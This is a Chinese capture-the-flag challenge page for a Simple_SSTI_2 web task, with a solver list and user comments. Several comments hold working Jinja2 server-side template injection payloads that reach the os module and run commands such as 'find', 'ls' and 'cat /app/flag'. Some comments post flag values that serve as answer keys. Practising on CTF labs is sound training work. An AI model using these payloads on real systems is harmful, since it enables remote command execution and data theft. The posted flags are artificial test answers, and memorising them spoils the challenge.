Simple_SSTI_2WEB 未解决
分数:
10
金币:
3
题目作者:
valecalida
一 血:
Tokeii
一血奖励:
3金币
解 决:
16096
提 示:
描 述:
Simple_SSTI_2
评分(15)
解题动态

5032894 攻破了该题 1小时前

那天晚风和她 攻破了该题 2天前

huangyujie 攻破了该题 2天前

yamojito 攻破了该题 3天前

lin666 攻破了该题 3天前

Vergil 攻破了该题 5天前

乐乐a 攻破了该题 5天前

psych1 攻破了该题 5天前

eight8 攻破了该题 6天前

stragon 攻破了该题 6天前

liutong27 攻破了该题 6天前

tiger007 攻破了该题 6天前

Leext 攻破了该题 7天前

storysnail 攻破了该题 7天前

zengzhijing 攻破了该题 7天前

ffggfhge 攻破了该题 7天前

孙燕姿圈外男友 攻破了该题 8天前

huasir 攻破了该题 8天前

xiayanting 攻破了该题 9天前

评论
2280443298 1年前
举报
{{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
zhenbuhuiweb 1年前
举报
flag{d15e0ca95ddb50b992109b24c82cfe5a}
ssln 1年前
举报
114.67.175.224:12792/?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}} 看不懂,应该是什么固定格式,修改“ls”即可执行命令
210470qq 1年前
举报
flag{43b52fa732d6f8ccbfacea9e989ac07b}
songci 1年前
举报
ssti模板注入,尝试获取OS module进行命令执行或文件读取,使用init.globals来看看有没有os module或者其他的可以读写文件的,爆破获取300存在:{{"".__class__.__mro__[1].__subclasses__()[300].__init__.__globals__}},进行命令执行获取flag:?flag={{""
Mirabelle 1年前
举报
?flag={{config.__class__.__init__.__globals__['os'].popen('ls').read()}}; ?flag={{config.__class__.__init__.__globals__['os'].popen('cat flag').read()}}
ZeronKR1212 1年前
举报
怎么做啊,哥哥们
kimizu 1年前
举报
SSTI模板注入,先尝试搜索有没有flag文件,发现有,cat以下就行 {{config.__class__.__init__.__globals__['os'].popen('find / -name flag').read()}} {{config.__class__.__init__.__globals__['os'].popen('cat /app/flag').read()}}
3347665154 1年前
举报
flag{a0a8ab35c083003f4bb44c7920b69bd1}
jinyuxin 1年前
举报
flag{3da091678f181776084413b87192ea57}